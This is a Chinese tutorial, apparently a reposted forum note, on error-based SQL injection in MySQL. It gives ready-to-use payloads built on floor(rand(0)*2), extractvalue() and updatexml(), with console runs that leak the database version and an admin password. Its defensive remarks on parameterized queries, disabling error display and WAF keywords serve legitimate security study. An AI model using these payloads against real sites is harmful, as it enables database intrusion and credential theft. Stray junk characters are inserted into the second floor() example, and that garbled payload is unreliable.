放一点原来的笔记:MySQL 在执行语句出错时会抛出异常信息,而 PHP+MySQL 架构的网站往往又把数据库错误信息原样显示在页面上,这样就可以构造如下三种语句,让想要的数据出现在错误信息里被回显出来。(防御角度:根本原因是用户输入被直接拼进 SQL,再加上错误回显;正确做法是使用参数化查询(PDO/mysqli 预处理语句),生产环境关闭 display_errors,数据库错误只写日志、不回显给用户。)
实际测试环境(MySQL 5.1.33-community-log,版本号来自下文的报错信息):

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor() 报错
可以使用如下几种利用代码(原理:rand(0) 产生的序列是固定的,floor(rand(0)*2) 在 group by 分组时会先后得到同一个 key,向临时表插入时触发主键冲突 ERROR 1062,而冲突的 key 值——也就是我们拼进去的数据——会原样出现在错误信息中。用来分组的表至少要有 3 行,所以下面第二种写法用 union 凑出了 3 行):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 参数存在注入,就可以通过如下语句触发报错。

mysql> select * from article where id = 1 and (select 1 from
    (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了 MySQL 的版本(注意报错值末尾的 '1' 是 floor(rand(0)*2) 产生的,不属于版本号,真实版本是 5.1.33-community-log;下文的 'admin8881' 同理,密码其实是 admin888)。如果需要查询其他数据,把 version() 所在位置换成相应的子查询即可。
例如我们需要查询管理员的用户名和密码:
Method1:

mysql> select * from article where id = 1 and (select 1 from
    (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
    from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

2 M) L$ O6 I9 H" Bmysql> select * from article where id = 1 and (select count(*)5 ~5 p0 ^; O4 ]* j" ?4 j: m; D1 p8 Y
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
T, k* I8 f+ V; {0 A6 j0 rfloor(rand(0)*2)));5 B& `$ K- j$ T9 Q2 A+ Z
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下(需要 MySQL 5.1.5 及以上,本文环境为 5.1.33;0x5c 即 '\',放在开头是为了构造一个非法的 XPath 表达式,这样整个字符串都会原样出现在 XPATH syntax error 里。注意该报错最多只回显 32 个字符,更长的数据要配合 substr()/mid() 分段读取):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
    (select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句(0x5e24 即 '^$',作用和上面的 0x5c 一样,用来制造 XPath 语法错误;同样只回显前 32 个字符)

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
    (select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.

补充(检测与防御):以上三种方式都依赖 floor(rand(0)*2)、extractvalue()、updatexml() 这几个特征函数,可以作为 WAF 规则和访问日志检测的关键字;但治本的办法仍然是参数化查询和关闭数据库错误回显。